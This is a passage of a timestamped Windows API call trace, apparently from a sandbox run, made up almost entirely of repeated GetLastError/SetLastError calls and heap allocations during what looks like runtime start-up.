[0135.173] GetLastError () returned 0x0 [0135.173] SetLastError (dwErrCode=0x0) [0135.174] GetLastError () returned 0x0 [0135.174] SetLastError (dwErrCode=0x0) [0135.174] GetLastError () returned 0x0 [0135.174] SetLastError (dwErrCode=0x0) [0135.174] GetLastError () returned 0x0 [0135.174] SetLastError (dwErrCode=0x0) [0135.174] GetLastError () returned 0x0 [0135.174] SetLastError (dwErrCode=0x0) [0135.174] GetLastError () returned 0x0 [0135.174] SetLastError (dwErrCode=0x0) [0135.174] GetLastError () returned 0x0 [0135.174] SetLastError (dwErrCode=0x0) [0135.174] GetLastError () returned 0x0 [0135.174] SetLastError (dwErrCode=0x0) [0135.174] GetLastError () returned 0x0 [0135.175] SetLastError (dwErrCode=0x0) [0135.175] GetLastError () returned 0x0 [0135.175] SetLastError (dwErrCode=0x0) [0135.175] RtlAllocateHeap (HeapHandle=0x2220000, Flags=0x0, Size=0x68) returned 0x2221838 [0135.175] GetLastError () returned 0x0 [0135.175] SetLastError (dwErrCode=0x0) [0135.175] GetLastError () returned 0x0 [0135.175] SetLastError (dwErrCode=0x0) [0135.175] GetLastError () returned 0x0 [0135.175] SetLastError (dwErrCode=0x0) [0135.175] GetLastError () returned 0x0 [0135.175] SetLastError (dwErrCode=0x0) [0135.175] GetLastError () returned 0x0 [0135.175] SetLastError (dwErrCode=0x0) [0135.175] GetLastError () returned 0x0 [0135.175] SetLastError (dwErrCode=0x0) [0135.175] GetLastError () returned 0x0 [0135.176] SetLastError (dwErrCode=0x0) [0135.176] GetLastError () returned 0x0 [0135.176] SetLastError (dwErrCode=0x0) [0135.176] GetLastError () returned 0x0 [0135.176] SetLastError (dwErrCode=0x0) [0135.176] GetLastError () returned 0x0 [0135.176] SetLastError (dwErrCode=0x0) [0135.176] GetLastError () returned 0x0 [0135.176] SetLastError (dwErrCode=0x0) [0135.176] GetLastError () returned 0x0 [0135.176] SetLastError (dwErrCode=0x0) [0135.176] GetLastError () returned 0x0 [0135.176] SetLastError (dwErrCode=0x0) [0135.176] GetLastError () returned 0x0 [0135.176] SetLastError (dwErrCode=0x0) [0135.176] GetLastError () returned 0x0 [0135.176] SetLastError (dwErrCode=0x0) [0135.177] GetLastError () returned 0x0 [0135.177] SetLastError (dwErrCode=0x0) [0135.177] GetLastError () returned 0x0 [0135.177] SetLastError (dwErrCode=0x0) [0135.177] GetLastError () returned 0x0 [0135.177] SetLastError (dwErrCode=0x0) [0135.177] GetLastError () returned 0x0 [0135.177] SetLastError (dwErrCode=0x0) [0135.177] GetLastError () returned 0x0 [0135.177] SetLastError (dwErrCode=0x0) [0135.177] GetLastError () returned 0x0 [0135.177] SetLastError (dwErrCode=0x0) [0135.177] GetLastError () returned 0x0 [0135.177] SetLastError (dwErrCode=0x0) [0135.177] GetLastError () returned 0x0 [0135.177] SetLastError (dwErrCode=0x0) [0135.178] GetLastError () returned 0x0 [0135.178] SetLastError (dwErrCode=0x0) [0135.178] GetLastError () returned 0x0 [0135.179] SetLastError (dwErrCode=0x0) [0135.179] GetLastError () returned 0x0 [0135.179] SetLastError (dwErrCode=0x0) [0135.179] GetLastError () returned 0x0 [0135.179] SetLastError (dwErrCode=0x0) [0135.179] GetLastError () returned 0x0 [0135.179] SetLastError (dwErrCode=0x0) [0135.179] GetLastError () returned 0x0 [0135.179] SetLastError (dwErrCode=0x0) [0135.179] GetLastError () returned 0x0 [0135.179] SetLastError (dwErrCode=0x0) [0135.179] GetLastError () returned 0x0 [0135.179] SetLastError (dwErrCode=0x0) [0135.179] GetLastError () returned 0x0 [0135.179] SetLastError (dwErrCode=0x0) [0135.179] GetLastError () returned 0x0 [0135.180] SetLastError (dwErrCode=0x0) [0135.180] GetLastError () returned 0x0 [0135.180] SetLastError (dwErrCode=0x0) [0135.180] GetLastError () returned 0x0 [0135.180] SetLastError (dwErrCode=0x0) [0135.180] GetLastError () returned 0x0 [0135.180] SetLastError (dwErrCode=0x0) [0135.180] GetLastError () returned 0x0 [0135.180] SetLastError (dwErrCode=0x0) [0135.180] GetLastError () returned 0x0 [0135.180] SetLastError (dwErrCode=0x0) [0135.180] GetLastError () returned 0x0 [0135.180] SetLastError (dwErrCode=0x0) [0135.180] GetLastError () returned 0x0 [0135.180] SetLastError (dwErrCode=0x0) [0135.181] GetLastError () returned 0x0 [0135.181] SetLastError (dwErrCode=0x0) [0135.181] GetLastError () returned 0x0 [0135.181] SetLastError (dwErrCode=0x0) [0135.181] GetLastError () returned 0x0 [0135.181] SetLastError (dwErrCode=0x0) [0135.181] GetLastError () returned 0x0 [0135.181] SetLastError (dwErrCode=0x0) [0135.181] GetLastError () returned 0x0 [0135.181] SetLastError (dwErrCode=0x0) [0135.181] GetLastError () returned 0x0 [0135.181] SetLastError (dwErrCode=0x0) [0135.181] GetLastError () returned 0x0 [0135.181] SetLastError (dwErrCode=0x0) [0135.181] GetLastError () returned 0x0 [0135.181] SetLastError (dwErrCode=0x0) [0135.182] GetLastError () returned 0x0 [0135.182] SetLastError (dwErrCode=0x0) [0135.182] GetLastError () returned 0x0 [0135.182] SetLastError (dwErrCode=0x0) [0135.182] GetLastError () returned 0x0 [0135.182] SetLastError (dwErrCode=0x0) [0135.182] GetLastError () returned 0x0 [0135.182] SetLastError (dwErrCode=0x0) [0135.182] GetLastError () returned 0x0 [0135.182] SetLastError (dwErrCode=0x0) [0135.182] GetLastError () returned 0x0 [0135.182] SetLastError (dwErrCode=0x0) [0135.182] GetLastError () returned 0x0 [0135.182] SetLastError (dwErrCode=0x0) [0135.182] GetLastError () returned 0x0 [0135.182] SetLastError (dwErrCode=0x0) [0135.183] GetLastError () returned 0x0 [0135.183] SetLastError (dwErrCode=0x0) [0135.183] GetLastError () returned 0x0 [0135.183] SetLastError (dwErrCode=0x0) [0135.183] GetLastError () returned 0x0 [0135.183] SetLastError (dwErrCode=0x0) [0135.183] GetLastError () returned 0x0 [0135.183] SetLastError (dwErrCode=0x0) [0135.183] GetLastError () returned 0x0 [0135.183] SetLastError (dwErrCode=0x0) [0135.183] GetLastError () returned 0x0 [0135.183] SetLastError (dwErrCode=0x0) [0135.183] GetLastError () returned 0x0 [0135.183] SetLastError (dwErrCode=0x0) [0135.183] GetLastError () returned 0x0 [0135.184] SetLastError (dwErrCode=0x0) [0135.184] GetLastError () returned 0x0 [0135.184] SetLastError (dwErrCode=0x0) [0135.184] GetLastError () returned 0x0 [0135.184] SetLastError (dwErrCode=0x0) [0135.184] GetLastError () returned 0x0 [0135.184] SetLastError (dwErrCode=0x0) [0135.184] GetLastError () returned 0x0 [0135.184] SetLastError (dwErrCode=0x0) [0135.184] GetLastError () returned 0x0 [0135.184] SetLastError (dwErrCode=0x0) [0135.184] GetLastError () returned 0x0 [0135.184] SetLastError (dwErrCode=0x0) [0135.184] GetLastError () returned 0x0 [0135.184] SetLastError (dwErrCode=0x0) [0135.184] GetLastError () returned 0x0 [0135.185] SetLastError (dwErrCode=0x0) [0135.185] GetLastError () returned 0x0 [0135.185] SetLastError (dwErrCode=0x0) [0135.185] GetLastError () returned 0x0 [0135.185] SetLastError (dwErrCode=0x0) [0135.185] GetLastError () returned 0x0 [0135.185] SetLastError (dwErrCode=0x0) [0135.185] GetLastError () returned 0x0 [0135.185] SetLastError (dwErrCode=0x0) [0135.185] GetLastError () returned 0x0 [0135.185] SetLastError (dwErrCode=0x0) [0135.185] GetLastError () returned 0x0 [0135.185] SetLastError (dwErrCode=0x0) [0135.185] GetLastError () returned 0x0 [0135.185] SetLastError (dwErrCode=0x0) [0135.185] GetLastError () returned 0x0 [0135.186] SetLastError (dwErrCode=0x0) [0135.186] GetLastError () returned 0x0 [0135.186] SetLastError (dwErrCode=0x0) [0135.186] GetLastError () returned 0x0 [0135.186] SetLastError (dwErrCode=0x0) [0135.186] GetLastError () returned 0x0 [0135.186] SetLastError (dwErrCode=0x0) [0135.186] GetLastError () returned 0x0 [0135.186] SetLastError (dwErrCode=0x0) [0135.186] GetLastError () returned 0x0 [0135.186] SetLastError (dwErrCode=0x0) [0135.186] GetLastError () returned 0x0 [0135.186] SetLastError (dwErrCode=0x0) [0135.186] GetLastError () returned 0x0 [0135.186] SetLastError (dwErrCode=0x0) [0135.186] GetLastError () returned 0x0 [0135.187] SetLastError (dwErrCode=0x0) [0135.187] GetLastError () returned 0x0 [0135.187] SetLastError (dwErrCode=0x0) [0135.187] GetLastError () returned 0x0 [0135.187] SetLastError (dwErrCode=0x0) [0135.187] GetLastError () returned 0x0 [0135.187] SetLastError (dwErrCode=0x0) [0135.187] GetLastError () returned 0x0 [0135.187] SetLastError (dwErrCode=0x0) [0135.187] GetLastError () returned 0x0 [0135.187] SetLastError (dwErrCode=0x0) [0135.187] GetLastError () returned 0x0 [0135.187] SetLastError (dwErrCode=0x0) [0135.187] GetLastError () returned 0x0 [0135.187] SetLastError (dwErrCode=0x0) [0135.187] GetLastError () returned 0x0 [0135.188] SetLastError (dwErrCode=0x0) [0135.188] RtlAllocateHeap (HeapHandle=0x2220000, Flags=0x8, Size=0x9c) returned 0x22218a8 [0135.188] RtlAllocateHeap (HeapHandle=0x2220000, Flags=0x8, Size=0x1f) returned 0x2221950 [0135.188] RtlAllocateHeap (HeapHandle=0x2220000, Flags=0x8, Size=0x2b) returned 0x2221978 [0135.188] RtlAllocateHeap (HeapHandle=0x2220000, Flags=0x8, Size=0x2c) returned 0x22219b0 [0135.188] RtlAllocateHeap (HeapHandle=0x2220000, Flags=0x8, Size=0x37) returned 0x22219e8 [0135.188] RtlAllocateHeap (HeapHandle=0x2220000, Flags=0x8, Size=0x3c) returned 0x2221a28 [0135.188] RtlAllocateHeap (HeapHandle=0x2220000, Flags=0x8, Size=0x31) returned 0x2221a70 [0135.188] RtlAllocateHeap (HeapHandle=0x2220000, Flags=0x8, Size=0x18) returned 0x2221ab0 [0135.188] RtlAllocateHeap (HeapHandle=0x2220000, Flags=0x8, Size=0x24) returned 0x2221ad0 [0135.188] RtlAllocateHeap (HeapHandle=0x2220000, Flags=0x8, Size=0x32) returned 0x2221b00 [0135.188] RtlAllocateHeap (HeapHandle=0x2220000, Flags=0x8, Size=0xd) returned 0x2221b40 [0135.188] RtlAllocateHeap (HeapHandle=0x2220000, Flags=0x8, Size=0x1a) returned 0x2221b58 [0135.188] RtlAllocateHeap (HeapHandle=0x2220000, Flags=0x8, Size=0x2e) returned 0x2221b80 [0135.188] RtlAllocateHeap (HeapHandle=0x2220000, Flags=0x8, Size=0x19) returned 0x2221bb8 [0135.188] RtlAllocateHeap (HeapHandle=0x2220000, Flags=0x8, Size=0x17) returned 0x2221be0 [0135.188] RtlAllocateHeap (HeapHandle=0x2220000, Flags=0x8, Size=0x25) returned 0x2221c00 [0135.188] RtlAllocateHeap (HeapHandle=0x2220000, Flags=0x8, Size=0xe) returned 0x2221c30 [0135.188] RtlAllocateHeap (HeapHandle=0x2220000, Flags=0x8, Size=0xf6) returned 0x2221c48 [0135.188] RtlAllocateHeap (HeapHandle=0x2220000, Flags=0x8, Size=0x3e) returned 0x2221d48 [0135.188] RtlAllocateHeap (HeapHandle=0x2220000, Flags=0x8, Size=0x1b) returned 0x2221d90 [0135.188] RtlAllocateHeap (HeapHandle=0x2220000, Flags=0x8, Size=0x1d) returned 0x2221db8 [0135.188] RtlAllocateHeap (HeapHandle=0x2220000, Flags=0x8, Size=0x48) returned 0x2221de0 [0135.188] RtlAllocateHeap (HeapHandle=0x2220000, Flags=0x8, Size=0x12) returned 0x2221e30 [0135.188] RtlAllocateHeap (HeapHandle=0x2220000, Flags=0x8, Size=0x18) returned 0x2221e50 [0135.188] RtlAllocateHeap (HeapHandle=0x2220000, Flags=0x8, Size=0x1b) returned 0x2221e70 [0135.189] RtlAllocateHeap (HeapHandle=0x2220000, Flags=0x8, Size=0x24) returned 0x2221e98 [0135.189] RtlAllocateHeap (HeapHandle=0x2220000, Flags=0x8, Size=0x29) returned 0x2221ec8 [0135.189] RtlAllocateHeap (HeapHandle=0x2220000, Flags=0x8, Size=0x1e) returned 0x2221f00 [0135.189] RtlAllocateHeap (HeapHandle=0x2220000, Flags=0x8, Size=0x6b) returned 0x2221f28 [0135.189] RtlAllocateHeap (HeapHandle=0x2220000, Flags=0x8, Size=0x17) returned 0x2221fa0 [0135.189] RtlAllocateHeap (HeapHandle=0x2220000, Flags=0x8, Size=0xf) returned 0x2221fc0 [0135.189] RtlAllocateHeap (HeapHandle=0x2220000, Flags=0x8, Size=0x16) returned 0x2221fd8 [0135.189] RtlAllocateHeap (HeapHandle=0x2220000, Flags=0x8, Size=0x2a) returned 0x2221ff8 [0135.189] RtlAllocateHeap (HeapHandle=0x2220000, Flags=0x8, Size=0x29) returned 0x2222030 [0135.189] RtlAllocateHeap (HeapHandle=0x2220000, Flags=0x8, Size=0x16) returned 0x2222068 [0135.189] RtlAllocateHeap (HeapHandle=0x2220000, Flags=0x8, Size=0x25) returned 0x2222088 [0135.189] RtlAllocateHeap (HeapHandle=0x2220000, Flags=0x8, Size=0x13) returned 0x22220b8 [0135.189] RtlAllocateHeap (HeapHandle=0x2220000, Flags=0x8, Size=0x1f) returned 0x22220d8 [0135.189] RtlAllocateHeap (HeapHandle=0x2220000, Flags=0x8, Size=0x12) returned 0x2222100 [0135.201] HeapFree (in: hHeap=0x2220000, dwFlags=0x0, lpMem=0x2220fe8 | out: hHeap=0x2220000) returned 1 [0135.236] RtlAllocateHeap (HeapHandle=0x2220000, Flags=0x8, Size=0x800) returned 0x2222120 [0135.236] RtlAllocateHeap (HeapHandle=0x2220000, Flags=0x8, Size=0x80) returned 0x2220fe8 [0135.236] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0135.236] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4047d9) returned 0x0 [0135.236] RtlSizeHeap (HeapHandle=0x2220000, Flags=0x0, MemoryPointer=0x2220fe8) returned 0x80 [0135.237] GetLastError () returned 0x0 [0135.237] SetLastError (dwErrCode=0x0) [0135.237] GetLastError () returned 0x0 [0135.237] SetLastError (dwErrCode=0x0) [0135.237] GetLastError () returned 0x0 [0135.237] SetLastError (dwErrCode=0x0) [0135.237] GetLastError () returned 0x0 [0135.237] SetLastError (dwErrCode=0x0) [0135.237] GetLastError () returned 0x0 [0135.237] SetLastError (dwErrCode=0x0) [0135.237] GetLastError () returned 0x0 [0135.237] SetLastError (dwErrCode=0x0) [0135.237] GetLastError () returned 0x0 [0135.237] SetLastError (dwErrCode=0x0) [0135.237] GetLastError () returned 0x0 [0135.237] SetLastError (dwErrCode=0x0) [0135.237] GetLastError () returned 0x0 [0135.237] SetLastError (dwErrCode=0x0) [0135.238] GetLastError () returned 0x0 [0135.238] SetLastError (dwErrCode=0x0) [0135.238] GetLastError () returned 0x0 [0135.238] SetLastError (dwErrCode=0x0) [0135.238] GetLastError () returned 0x0 [0135.238] SetLastError (dwErrCode=0x0) [0135.238] GetLastError () returned 0x0 [0135.238] SetLastError (dwErrCode=0x0) [0135.238] GetLastError () returned 0x0 [0135.238] SetLastError (dwErrCode=0x0) [0135.238] GetLastError () returned 0x0 [0135.238] SetLastError (dwErrCode=0x0) [0135.238] GetLastError () returned 0x0 [0135.238] SetLastError (dwErrCode=0x0) [0135.238] GetLastError () returned 0x0 [0135.238] SetLastError (dwErrCode=0x0) [0135.239] GetLastError () returned 0x0 [0135.239] SetLastError (dwErrCode=0x0) [0135.239] GetLastError () returned 0x0 [0135.239] SetLastError (dwErrCode=0x0) [0135.239] GetLastError () returned 0x0 [0135.239] SetLastError (dwErrCode=0x0) [0135.239] GetLastError () returned 0x0 [0135.239] SetLastError (dwErrCode=0x0) [0135.239] GetLastError () returned 0x0 [0135.239] SetLastError (dwErrCode=0x0) [0135.239] GetLastError () returned 0x0 [0135.239] SetLastError (dwErrCode=0x0) [0135.239] GetLastError () returned 0x0 [0135.239] SetLastError (dwErrCode=0x0) [0135.239] GetLastError () returned 0x0 [0135.240] SetLastError (dwErrCode=0x0) [0135.240] GetLastError () returned 0x0 [0135.240] SetLastError (dwErrCode=0x0) [0135.240] GetLastError () returned 0x0 [0135.240] SetLastError (dwErrCode=0x0) [0135.240] GetLastError () returned 0x0 [0135.240] SetLastError (dwErrCode=0x0) [0135.241] GetLastError () returned 0x0 [0135.241] SetLastError (dwErrCode=0x0) [0135.241] GetLastError () returned 0x0 [0135.241] SetLastError (dwErrCode=0x0) [0135.241] GetLastError () returned 0x0 [0135.242] SetLastError (dwErrCode=0x0) [0135.242] GetLastError () returned 0x0 [0135.242] SetLastError (dwErrCode=0x0) [0135.242] GetLastError () returned 0x0 [0135.242] SetLastError (dwErrCode=0x0) [0135.242] GetLastError () returned 0x0 [0135.242] SetLastError (dwErrCode=0x0) [0135.242] GetLastError () returned 0x0 [0135.242] SetLastError (dwErrCode=0x0) [0135.242] GetLastError () returned 0x0 [0135.242] SetLastError (dwErrCode=0x0) [0135.242] GetLastError () returned 0x0 [0135.242] SetLastError (dwErrCode=0x0) [0135.242] GetLastError () returned 0x0 [0135.242] SetLastError (dwErrCode=0x0) [0135.242] GetLastError () returned 0x0 [0135.242] SetLastError (dwErrCode=0x0) [0135.242] GetLastError () returned 0x0 [0135.243] SetLastError (dwErrCode=0x0) [0135.243] GetLastError () returned 0x0 [0135.243] SetLastError (dwErrCode=0x0) [0135.243] GetLastError () returned 0x0 [0135.243] SetLastError (dwErrCode=0x0) [0135.243] GetLastError () returned 0x0 [0135.243] SetLastError (dwErrCode=0x0) [0135.243] GetLastError () returned 0x0 [0135.243] SetLastError (dwErrCode=0x0) [0135.243] GetLastError () returned 0x0 [0135.243] SetLastError (dwErrCode=0x0) [0135.243] GetLastError () returned 0x0 [0135.243] SetLastError (dwErrCode=0x0) [0135.243] GetLastError () returned 0x0 [0135.243] SetLastError (dwErrCode=0x0) [0135.243] GetLastError () returned 0x0 [0135.244] SetLastError (dwErrCode=0x0) [0135.244] GetLastError () returned 0x0 [0135.244] SetLastError (dwErrCode=0x0) [0135.244] GetLastError () returned 0x0 [0135.244] SetLastError (dwErrCode=0x0) [0135.244] GetLastError () returned 0x0 [0135.244] SetLastError (dwErrCode=0x0) [0135.244] GetLastError () returned 0x0 [0135.244] SetLastError (dwErrCode=0x0) [0135.244] GetLastError () returned 0x0 [0135.244] SetLastError (dwErrCode=0x0) [0135.244] GetLastError () returned 0x0 [0135.244] SetLastError (dwErrCode=0x0) [0135.244] GetLastError () returned 0x0 [0135.244] SetLastError (dwErrCode=0x0) [0135.244] GetLastError () returned 0x0 [0135.244] SetLastError (dwErrCode=0x0) [0135.244] GetLastError () returned 0x0 [0135.245] SetLastError (dwErrCode=0x0) [0135.245] GetLastError () returned 0x0 [0135.245] SetLastError (dwErrCode=0x0) [0135.245] GetLastError () returned 0x0 [0135.245] SetLastError (dwErrCode=0x0) [0135.245] GetLastError () returned 0x0 [0135.245] SetLastError (dwErrCode=0x0) [0135.245] GetLastError () returned 0x0 [0135.245] SetLastError (dwErrCode=0x0) [0135.245] GetLastError () returned 0x0 [0135.245] SetLastError (dwErrCode=0x0) [0135.245] GetLastError () returned 0x0 [0135.245] SetLastError (dwErrCode=0x0) [0135.245] GetLastError () returned 0x0 [0135.245] SetLastError (dwErrCode=0x0) [0135.245] GetLastError () returned 0x0 [0135.245] SetLastError (dwErrCode=0x0) [0135.245] GetLastError () returned 0x0 [0135.246] SetLastError (dwErrCode=0x0) [0135.246] GetLastError () returned 0x0 [0135.246] SetLastError (dwErrCode=0x0) [0135.246] GetLastError () returned 0x0 [0135.246] SetLastError (dwErrCode=0x0) [0135.246] GetLastError () returned 0x0 [0135.246] SetLastError (dwErrCode=0x0) [0135.246] GetLastError () returned 0x0 [0135.246] SetLastError (dwErrCode=0x0) [0135.246] GetLastError () returned 0x0 [0135.246] SetLastError (dwErrCode=0x0) [0135.246] GetLastError () returned 0x0 [0135.246] SetLastError (dwErrCode=0x0) [0135.246] GetLastError () returned 0x0 [0135.246] SetLastError (dwErrCode=0x0) [0135.246] GetLastError () returned 0x0 [0135.246] SetLastError (dwErrCode=0x0) [0135.246] GetLastError () returned 0x0 [0135.246] SetLastError (dwErrCode=0x0) [0135.247] GetLastError () returned 0x0 [0135.247] SetLastError (dwErrCode=0x0) [0135.247] GetLastError () returned 0x0 [0135.247] SetLastError (dwErrCode=0x0) [0135.247] GetLastError () returned 0x0 [0135.247] SetLastError (dwErrCode=0x0) [0135.247] GetLastError () returned 0x0 [0135.247] SetLastError (dwErrCode=0x0) [0135.247] GetLastError () returned 0x0 [0135.247] SetLastError (dwErrCode=0x0) [0135.247] GetLastError () returned 0x0 [0135.247] SetLastError (dwErrCode=0x0) [0135.247] GetLastError () returned 0x0 [0135.247] SetLastError (dwErrCode=0x0) [0135.247] GetLastError () returned 0x0 [0135.247] SetLastError (dwErrCode=0x0) [0135.247] GetLastError () returned 0x0 [0135.247] SetLastError (dwErrCode=0x0) [0135.247] GetLastError () returned 0x0 [0135.248] SetLastError (dwErrCode=0x0) [0135.248] GetLastError () returned 0x0 [0135.248] SetLastError (dwErrCode=0x0) [0135.248] GetLastError () returned 0x0 [0135.248] SetLastError (dwErrCode=0x0) [0135.248] GetLastError () returned 0x0 [0135.248] SetLastError (dwErrCode=0x0) [0135.248] GetLastError () returned 0x0 [0135.248] SetLastError (dwErrCode=0x0) [0135.248] GetLastError () returned 0x0 [0135.248] SetLastError (dwErrCode=0x0) [0135.248] GetLastError () returned 0x0 [0135.248] SetLastError (dwErrCode=0x0) [0135.248] GetLastError () returned 0x0 [0135.248] SetLastError (dwErrCode=0x0) [0135.248] GetLastError () returned 0x0 [0135.248] SetLastError (dwErrCode=0x0) [0135.248] GetLastError () returned 0x0 [0135.248] SetLastError (dwErrCode=0x0) [0135.248] GetLastError () returned 0x0 [0135.248] SetLastError (dwErrCode=0x0) [0135.249] GetLastError () returned 0x0 [0135.249] SetLastError (dwErrCode=0x0) [0135.249] GetLastError () returned 0x0 [0135.249] SetLastError (dwErrCode=0x0) [0135.315] SetLastError (dwErrCode=0x0) [0135.315] SetLastError (dwErrCode=0x0) [0135.315] SetLastError (dwErrCode=0x0) [0135.315] SetLastError (dwErrCode=0x0) [0135.315] SetLastError (dwErrCode=0x0) [0135.315] SetLastError (dwErrCode=0x0) [0135.315] SetLastError (dwErrCode=0x0) [0135.315] SetLastError (dwErrCode=0x0) [0135.315] SetLastError (dwErrCode=0x0) [0135.315] SetLastError (dwErrCode=0x0) [0135.315] SetLastError (dwErrCode=0x0) [0135.315] SetLastError (dwErrCode=0x0) [0135.315] SetLastError (dwErrCode=0x0) [0135.315] SetLastError (dwErrCode=0x0) [0135.315] SetLastError (dwErrCode=0x0) [0135.315] SetLastError (dwErrCode=0x0) [0135.315] SetLastError (dwErrCode=0x0) [0135.315] SetLastError (dwErrCode=0x0) [0135.315] SetLastError (dwErrCode=0x0) [0135.316] SetLastError (dwErrCode=0x0) [0135.316] SetLastError (dwErrCode=0x0) [0135.316] SetLastError (dwErrCode=0x0) [0135.316] SetLastError (dwErrCode=0x0) [0135.316] SetLastError (dwErrCode=0x0) [0135.316] SetLastError (dwErrCode=0x0) [0135.316] SetLastError (dwErrCode=0x0) [0135.316] SetLastError (dwErrCode=0x0) [0135.316] SetLastError (dwErrCode=0x0) [0135.316] SetLastError (dwErrCode=0x0) [0135.316] SetLastError (dwErrCode=0x0) [0135.316] SetLastError (dwErrCode=0x0) [0135.316] SetLastError (dwErrCode=0x0) [0135.316] SetLastError (dwErrCode=0x0) [0135.316] SetLastError (dwErrCode=0x0) [0135.316] SetLastError (dwErrCode=0x0) [0135.316] SetLastError (dwErrCode=0x0) [0135.316] SetLastError (dwErrCode=0x0) [0135.316] SetLastError (dwErrCode=0x0) [0135.316] SetLastError (dwErrCode=0x0) [0135.316] SetLastError (dwErrCode=0x0) [0135.316] SetLastError (dwErrCode=0x0) [0135.316] SetLastError (dwErrCode=0x0) [0135.316] SetLastError (dwErrCode=0x0) [0135.316] SetLastError (dwErrCode=0x0) [0135.316] SetLastError (dwErrCode=0x0) [0135.316] SetLastError (dwErrCode=0x0) [0135.316] SetLastError (dwErrCode=0x0) [0135.316] SetLastError (dwErrCode=0x0) [0135.316] SetLastError (dwErrCode=0x0) [0135.316] SetLastError (dwErrCode=0x0) [0135.316] SetLastError (dwErrCode=0x0) [0135.316] SetLastError (dwErrCode=0x0) [0135.316] SetLastError (dwErrCode=0x0) [0135.316] SetLastError (dwErrCode=0x0) [0135.317] SetLastError (dwErrCode=0x0) [0135.317] SetLastError (dwErrCode=0x0) [0135.317] SetLastError (dwErrCode=0x0) [0135.317] SetLastError (dwErrCode=0x0) [0135.317] SetLastError (dwErrCode=0x0) [0135.317] SetLastError (dwErrCode=0x0) [0135.317] SetLastError (dwErrCode=0x0) [0135.317] SetLastError (dwErrCode=0x0) [0135.317] SetLastError (dwErrCode=0x0) [0135.317] SetLastError (dwErrCode=0x0) [0135.317] SetLastError (dwErrCode=0x0) [0135.317] SetLastError (dwErrCode=0x0) [0135.317] SetLastError (dwErrCode=0x0) [0135.317] SetLastError (dwErrCode=0x0) [0135.317] SetLastError (dwErrCode=0x0) [0135.317] SetLastError (dwErrCode=0x0) [0135.317] SetLastError (dwErrCode=0x0) [0135.317] SetLastError (dwErrCode=0x0) [0135.317] SetLastError (dwErrCode=0x0) [0135.317] SetLastError (dwErrCode=0x0) [0135.317] SetLastError (dwErrCode=0x0) [0135.317] SetLastError (dwErrCode=0x0) [0135.317] SetLastError (dwErrCode=0x0) [0135.317] SetLastError (dwErrCode=0x0) [0135.317] SetLastError (dwErrCode=0x0) [0135.317] SetLastError (dwErrCode=0x0) [0135.317] SetLastError (dwErrCode=0x0) [0135.317] SetLastError (dwErrCode=0x0) [0135.317] SetLastError (dwErrCode=0x0) [0135.317] SetLastError (dwErrCode=0x0) [0135.317] SetLastError (dwErrCode=0x0) [0135.317] SetLastError (dwErrCode=0x0) [0135.317] SetLastError (dwErrCode=0x0) [0135.317] SetLastError (dwErrCode=0x0) [0135.317] SetLastError (dwErrCode=0x0) [0135.318] SetLastError (dwErrCode=0x0) [0135.318] SetLastError (dwErrCode=0x0) [0135.318] SetLastError (dwErrCode=0x0) [0135.318] SetLastError (dwErrCode=0x0) [0135.318] SetLastError (dwErrCode=0x0) [0135.318] SetLastError (dwErrCode=0x0) [0135.318] SetLastError (dwErrCode=0x0) [0135.318] SetLastError (dwErrCode=0x0) [0135.318] SetLastError (dwErrCode=0x0) [0135.318] SetLastError (dwErrCode=0x0) [0135.318] SetLastError (dwErrCode=0x0) [0135.318] SetLastError (dwErrCode=0x0) [0135.318] SetLastError (dwErrCode=0x0) [0135.318] SetLastError (dwErrCode=0x0) [0135.318] SetLastError (dwErrCode=0x0) [0135.318] SetLastError (dwErrCode=0x0) [0135.318] SetLastError (dwErrCode=0x0) [0135.318] SetLastError (dwErrCode=0x0) [0135.318] SetLastError (dwErrCode=0x0) [0135.318] SetLastError (dwErrCode=0x0) [0135.318] SetLastError (dwErrCode=0x0) [0135.318] SetLastError (dwErrCode=0x0) [0135.319] SetLastError (dwErrCode=0x0) [0135.319] SetLastError (dwErrCode=0x0) [0135.319] SetLastError (dwErrCode=0x0) [0135.319] SetLastError (dwErrCode=0x0) [0135.319] SetLastError (dwErrCode=0x0) [0135.319] SetLastError (dwErrCode=0x0) [0135.319] SetLastError (dwErrCode=0x0) [0135.319] SetLastError (dwErrCode=0x0) [0135.319] SetLastError (dwErrCode=0x0) [0135.319] SetLastError (dwErrCode=0x0) [0135.319] SetLastError (dwErrCode=0x0) [0135.319] SetLastError (dwErrCode=0x0) [0135.319] SetLastError (dwErrCode=0x0) [0135.319] SetLastError (dwErrCode=0x0) [0135.319] SetLastError (dwErrCode=0x0) [0135.319] SetLastError (dwErrCode=0x0) [0135.319] SetLastError (dwErrCode=0x0) [0135.319] SetLastError (dwErrCode=0x0) [0135.319] SetLastError (dwErrCode=0x0) [0135.319] SetLastError (dwErrCode=0x0) [0135.319] SetLastError (dwErrCode=0x0) [0135.319] SetLastError (dwErrCode=0x0) [0135.319] SetLastError (dwErrCode=0x0) [0135.319] SetLastError (dwErrCode=0x0) [0135.319] SetLastError (dwErrCode=0x0) [0135.319] SetLastError (dwErrCode=0x0) [0135.319] SetLastError (dwErrCode=0x0) [0135.319] SetLastError (dwErrCode=0x0) [0135.320] SetLastError (dwErrCode=0x0) [0135.320] SetLastError (dwErrCode=0x0) [0135.320] SetLastError (dwErrCode=0x0) [0135.320] SetLastError (dwErrCode=0x0) [0135.320] SetLastError (dwErrCode=0x0) [0135.320] SetLastError (dwErrCode=0x0) [0135.320] SetLastError (dwErrCode=0x0) [0135.320] SetLastError (dwErrCode=0x0) [0135.320] SetLastError (dwErrCode=0x0) [0135.320] SetLastError (dwErrCode=0x0) [0135.320] SetLastError (dwErrCode=0x0) [0135.320] SetLastError (dwErrCode=0x0) [0135.320] SetLastError (dwErrCode=0x0) [0135.320] SetLastError (dwErrCode=0x0) [0135.320] SetLastError (dwErrCode=0x0) [0135.320] SetLastError (dwErrCode=0x0) [0135.320] SetLastError (dwErrCode=0x0) [0135.320] SetLastError (dwErrCode=0x0) [0135.320] SetLastError (dwErrCode=0x0) [0135.320] SetLastError (dwErrCode=0x0) [0135.320] SetLastError (dwErrCode=0x0) [0135.320] SetLastError (dwErrCode=0x0) [0135.320] SetLastError (dwErrCode=0x0) [0135.320] SetLastError (dwErrCode=0x0) [0135.320] SetLastError (dwErrCode=0x0) [0135.320] SetLastError (dwErrCode=0x0) [0135.320] SetLastError (dwErrCode=0x0) [0135.320] SetLastError (dwErrCode=0x0) [0135.320] SetLastError (dwErrCode=0x0) [0135.320] SetLastError (dwErrCode=0x0) [0135.320] SetLastError (dwErrCode=0x0) [0135.320] SetLastError 